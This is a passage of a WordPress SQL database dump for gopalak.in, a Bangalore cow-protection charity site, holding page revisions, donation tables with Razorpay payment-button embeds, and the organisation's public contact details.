06:10:46','{\"fields\":[],\"id\":\"1848\",\"field_id\":1,\"settings\":{\"form_title\":\"Blank Form\",\"form_desc\":\"\",\"submit_text\":\"Submit\",\"submit_text_processing\":\"Sending...\",\"antispam\":\"1\",\"form_class\":\"\",\"submit_class\":\"\",\"ajax_submit\":\"1\",\"notification_enable\":\"1\",\"notifications\":{\"1\":{\"email\":\"{admin_email}\",\"subject\":\"New Blank Form Entry\",\"sender_name\":\"Gopalak\",\"sender_address\":\"{admin_email}\",\"replyto\":\"\",\"message\":\"{all_fields}\"}},\"confirmations\":{\"1\":{\"type\":\"message\",\"message\":\"Thanks for contacting us! We will be in touch with you shortly.\",\"message_scroll\":\"1\",\"page\":\"1756\",\"redirect\":\"\"}},\"form_tags\":[]},\"meta\":{\"template\":\"blank\"}}','Blank Form','','inherit','closed','closed','','1848-revision-v1','','','2022-10-19 11:40:46','2022-10-19 06:10:46','',1848,'https://gopalak.in/?p=1849',0,'revision','',0),(1850,1,'2022-10-19 11:43:23','0000-00-00 00:00:00','','donation','','draft','closed','closed','','','','','2022-10-19 11:43:23','0000-00-00 00:00:00','',0,'https://gopalak.in/?post_type=forminator_forms&p=1850',0,'forminator_forms','',0),(1851,1,'2022-10-19 12:28:58','2022-10-19 06:58:58','[[\"Organisation\",\"Purpose\",\"Amount\",\"Donate\"],[\"Gopalak donation2\",\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"500\",\"<form><script src=\\\"https://checkout.razorpay.com/v1/payment-button.js\\\" data-payment_button_id=\\\"pl_KW1visGnvZh1xR\\\" async> </script> </form>\"],[\"Gopalak donation3\",\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"500\",\"<form><script src=\\\"https://checkout.razorpay.com/v1/payment-button.js\\\" data-payment_button_id=\\\"pl_KW1visGnvZh1xR\\\" async> </script> </form>\"],[\"Gopalak donation4\",\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"500\",\"<form><script src=\\\"https://checkout.razorpay.com/v1/payment-button.js\\\" data-payment_button_id=\\\"pl_KW1visGnvZh1xR\\\" async> </script> </form>\"]]','Donation','','publish','closed','closed','','1851','','','2022-11-02 16:06:46','2022-11-02 10:36:46','',0,'https://gopalak.in/?post_type=tablepress_table&#038;p=1851',0,'tablepress_table','application/json',0),(1852,1,'2022-10-19 12:46:17','2022-10-19 07:16:17','[[\"Organisation\",\"Purpose\",\"Donate\"],[\"Gopalak donation2\",\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"<form><script src=\\\"https://checkout.razorpay.com/v1/payment-button.js\\\" data-payment_button_id=\\\"pl_KVXh43gBGGIVUq\\\" async> </script> </form>\"],[\"Gopalak donation3\",\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"<form><script src=\\\"https://checkout.razorpay.com/v1/payment-button.js\\\" data-payment_button_id=\\\"pl_KVXh43gBGGIVUq\\\" async> </script> </form>\"],[\"Gopalak donation4\",\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"<form><script src=\\\"https://checkout.razorpay.com/v1/payment-button.js\\\" data-payment_button_id=\\\"pl_KVXh43gBGGIVUq\\\" async> </script> </form>\"],[\"Gopalak donation5\",\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"<form><script src=\\\"https://checkout.razorpay.com/v1/payment-button.js\\\" data-payment_button_id=\\\"pl_KVXh43gBGGIVUq\\\" async> </script> </form>\"]]','Donation','','inherit','closed','closed','','1851-revision-v1','','','2022-10-19 12:46:17','2022-10-19 07:16:17','',1851,'https://gopalak.in/?p=1852',0,'revision','',0),(1854,1,'2022-10-19 13:27:42','2022-10-19 07:57:42','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>		\n			<a href=\"https://gopalak.in/campaigns/cattle-feed/\" role=\"button\">\n						Donate\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','donate','','inherit','closed','closed','','1816-revision-v1','','','2022-10-19 13:27:42','2022-10-19 07:57:42','',1816,'https://gopalak.in/?p=1854',0,'revision','',0),(1855,1,'2022-10-19 13:27:42','2022-10-19 07:57:42','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>		\n			<a href=\"https://gopalak.in/campaigns/cattle-feed/\" role=\"button\">\n						Donate\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','donate','','inherit','closed','closed','','1816-revision-v1','','','2022-10-19 13:27:42','2022-10-19 07:57:42','',1816,'https://gopalak.in/?p=1855',0,'revision','',0),(1856,1,'2022-10-19 13:27:43','2022-10-19 07:57:43','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>[table id=1 /]		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','donate','','inherit','closed','closed','','1816-revision-v1','','','2022-10-19 13:27:43','2022-10-19 07:57:43','',1816,'https://gopalak.in/?p=1856',0,'revision','',0),(1857,1,'2022-10-19 13:45:04','2022-10-19 08:15:04','[[\"Organisation\",\"Purpose\",\"Donate\"],[\"Gopalak donation2\",\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"<form><script src=\\\"https://checkout.razorpay.com/v1/payment-button.js\\\" data-payment_button_id=\\\"pl_KVYCIKe6dPbmgv\\\" async> </script> </form>\"],[\"Gopalak donation3\",\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"<form><script src=\\\"https://checkout.razorpay.com/v1/payment-button.js\\\" data-payment_button_id=\\\"pl_KVYCIKe6dPbmgv\\\" async> </script> </form>\"],[\"Gopalak donation4\",\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"<form><script src=\\\"https://checkout.razorpay.com/v1/payment-button.js\\\" data-payment_button_id=\\\"pl_KVYCIKe6dPbmgv\\\" async> </script> </form>\"],[\"Gopalak donation5\",\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"<form><script src=\\\"https://checkout.razorpay.com/v1/payment-button.js\\\" data-payment_button_id=\\\"pl_KVYCIKe6dPbmgv\\\" async> </script> </form>\"]]','Donation','','inherit','closed','closed','','1851-revision-v1','','','2022-10-19 13:45:04','2022-10-19 08:15:04','',1851,'https://gopalak.in/?p=1857',0,'revision','',0),(1859,1,'2022-10-19 15:17:09','2022-10-19 09:47:09','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.\n</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-19 15:17:09','2022-10-19 09:47:09','',1373,'https://gopalak.in/?p=1859',0,'revision','',0),(1860,1,'2022-10-19 15:17:09','2022-10-19 09:47:09','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.\n</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana 